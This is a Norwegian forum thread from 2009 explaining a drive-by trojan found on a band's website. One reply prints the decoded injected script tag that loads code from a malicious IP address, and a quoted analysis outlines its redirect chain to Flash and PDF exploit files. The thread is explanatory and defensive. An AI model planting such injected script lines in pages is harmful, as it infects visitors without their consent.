Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
AbonnerSkjul
Host1.no - Webhotell fra 29,-, virtuell server fra 249,-. 15% rabatt med rabattkode "nFF". Besøk oss på Host1.no!
  7 1188
lillepuke
lillepuke's Avatar
104 32
8. april 2009
Jeg bare spør, da jeg i grunn ikke har peiling på virus og trojanere og hvordan de fungerer i praksis Har liksom aldri hatt noen grunn til å bekymre meg for sånt tidligere, men nå sitter jeg med windows (vista) PC lånt av svigerfar, og her bruker han Norman.
Skulle sjekke ut den nye skiva Dream Theater kommer med, men når jeg går inn på hjemmesiden (**www.dreamtheater.net) deres får jeg beskjed hvert annet sekund om at Norman har funnet en trojaner og puttet den i karantene
For det første skjønner jeg ikke hva som da egentlig skjer, og hvor er det trojanerene i såfall gjemmer seg (?)
Nå føler jeg meg rimelig tett her, men er det noen som gidder å forklare meg hvordan de fungerer...?

Edit: la inn et par stjerner i linken.( i tilfelle)
Sist endret av lillepuke; 8. april 2009 kl. 06:16.
snippsat
snippsat's Avatar
1.393 716
8. april 2009
http://www.siteadvisor.com/sites/dreamtheater.net
Siden er god.
Dette er en falsk posetiv melding fra norman.

og hvor er det trojanerene i såfall gjemmer seg (?)
Vis hele sitatet...
Svaret gir du jo selv den blir satt i karantene.

Du må se i loggen til norman hvilken fil den reager på.
Da fungerer det sånn at du må sende en melding til norman,så dem får rettet opp i denne falske meldingen.

Er du usikker på om filen som blir lastet ned er god teste den på virustotal
Er det snakk om falsk posetiv vil 1 til toppen 3 finne at filen er infesert.
Sist endret av snippsat; 8. april 2009 kl. 08:19.
Zirto
Approved
706 110
8. april 2009
Det er sant det trådstarter skriver. Virusprogrammet kaspersky fant dette 08.04.2009 14:23:31 http://94.247.2.195/jquery.js Firefox [COLOR="Red"]Detected: Trojan-Downloader.JS.Agent.dwf [/COLOR]
Sist endret av Zirto; 8. april 2009 kl. 14:26.
jeppfi
jeppfi's Avatar
2.262 171
8. april 2009
Avast reagerte på den og
lillepuke
lillepuke's Avatar
Trådstarter
104 32
8. april 2009
"Svaret gir du jo selv den blir satt i karantene."



Joda, det jeg lurte på var hvor på websiden den kommer fra, siden jeg ikke har lastet ned noe, det eneste jeg gjør er jo rett og slett og slett å gå inn på siden?
Sist endret av lillepuke; 8. april 2009 kl. 15:21.
Astron
Astron's Avatar
442 58
8. april 2009
"Advarsel: Dette nettstedet kan skade datamaskinen!
Nettstedet på www.dreamtheater.net inneholder elementer fra nettstedet 94.247.2.195, som ser ut til å være vert for skadelig programvare – programvare som kan skade datamaskinen eller operere på annen måte uten ditt samtykke. Bare det å besøke et nettsted med skadelig programvare kan infisere datamaskinen.
Hvis du vil ha detaljert informasjon om problemene med disse elementene, kan du gå til Googles Diagnoseside for nettsikkerhet for 94.247.2.195.
Finn ut mer om hvordan du beskytter deg selv mot skadelig programvare på Internett.
Jeg forstår at dette nettstedet kan skade datamaskinen."

Chrome gikk haywire, tror du bør holde deg unna den siden jeg.
snippsat
snippsat's Avatar
1.393 716
8. april 2009
Det er sant det trådstarter skriver. Virusprogrammet kaspersky fant dette 08.04.2009 14:23:31 http://94.247.2.195/jquery.js Firefox Detected: Trojan-Downloader.JS.Agent.dwf
Vis hele sitatet...
Ja stemmer har kjørt "jquery.js" på virustotal og får flere gir advarsel på den.

Jeg analyser hva "jquery.js" faktis gjør.
Decoder jeg den får vi dette.
<script src=http://94.247.2.195/news/?id=101></script>
Den prøver og redirecte til en annen side "http://94.247.2.195/news/?id=101"

Denne siden er ikke aktiv lengere derfor gjør "jquery.js" ingen skade nå.
Jeg undersøkte litt hva den gjorde når adressen var aktiv.

The QUERY.JS it calls is modified with another escaped url with replace and so on...
this in return refers to http://94.247.2.195/news/?id=100
which calls three files :
http://94.247.2.195/news/?id=3 ( two times )
http://94.247.2.195/news/?id=2

the browser gets two flash files which I decompiled and a pdf file
containing this rqo1V9hKSNFXaI

The decompiled flash files shows the hacker using the loadBytes method of a sprite loader to load malicious code into the player.
The code itself is coded into a string and then decoded using a key.
Haven't figured out what is does yet but it is most probably a trojan. The flash 10 debugger shows the flash file
failing in a null exception.
Vis hele sitatet...
Den prøvde og utnytte sikkerhullet som var i flashplayer og pdf,dette er nå tettet i nyere versjoner.

Dette scripet skulle vært fjernet av eier av nettsiden.
Scriptet gjør ingen skade nå.
Dem som vil besøke siden uten advasler,bør sende mail til eier av nettside om problemet.

Joda, det jeg lurte på var hvor på websiden den kommer fra, siden jeg ikke har lastet ned noe, det eneste jeg gjør er jo rett og slett og slett å gå inn på siden?
Vis hele sitatet...
Når du går inn på en nettside blir flere filer lastet ned automatisk til deg.
Sist endret av snippsat; 8. april 2009 kl. 19:50.
lillepuke
lillepuke's Avatar
Trådstarter
104 32
8. april 2009
Ok! Nå ble jeg faktisk ganske mye klokere
Tusen takk for svar!